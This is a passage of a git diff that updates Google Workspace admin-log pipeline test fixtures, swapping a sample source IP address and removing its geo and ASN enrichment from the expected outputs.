"continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.821581600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", + "ingested": "2021-12-09T13:38:27.141321500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_DELETE_GATEWAY", "id": "1", @@ -174,7 +138,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.821587100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", + "ingested": "2021-12-09T13:38:27.141327Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_MODIFY_GATEWAY", "id": "1", @@ -257,7 +203,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -281,35 +227,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.821591600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.141332500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHAT_SETTING", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log index 9c3bd721f39..cec0118eed7 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log @@ -1,21 +1,21 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_DEVICE_STATE","parameters":[{"name":"DEVICE_NEW_STATE","value":"new"},{"name":"DEVICE_PREVIOUS_STATE","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"SEND_CHROME_OS_DEVICE_COMMAND","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_ANNOTATION","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_STATE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_USER_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"ISSUE_DEVICE_COMMAND","parameters":[{"name":"DEVICE_COMMAND_DETAILS","multiValue":["command","-a"]},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"MOVE_DEVICE_TO_ORG_UNIT_DETAILED","parameters":[{"name":"DEVICE_NEW_ORG_UNIT","value":"new"},{"name":"DEVICE_PREVIOUS_ORG_UNIT","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"REMOVE_CHROME_OS_APPLICATION_SETTINGS","parameters":[{"name":"APP_ID","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_DEVICE","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_DEVICE_STATE","parameters":[{"name":"DEVICE_NEW_STATE","value":"new"},{"name":"DEVICE_PREVIOUS_STATE","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"SEND_CHROME_OS_DEVICE_COMMAND","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_ANNOTATION","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_STATE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_USER_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"ISSUE_DEVICE_COMMAND","parameters":[{"name":"DEVICE_COMMAND_DETAILS","multiValue":["command","-a"]},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"MOVE_DEVICE_TO_ORG_UNIT_DETAILED","parameters":[{"name":"DEVICE_NEW_ORG_UNIT","value":"new"},{"name":"DEVICE_PREVIOUS_ORG_UNIT","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"REMOVE_CHROME_OS_APPLICATION_SETTINGS","parameters":[{"name":"APP_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_DEVICE","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json index 77ce51da980..f644b296556 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974579Z", - "original": 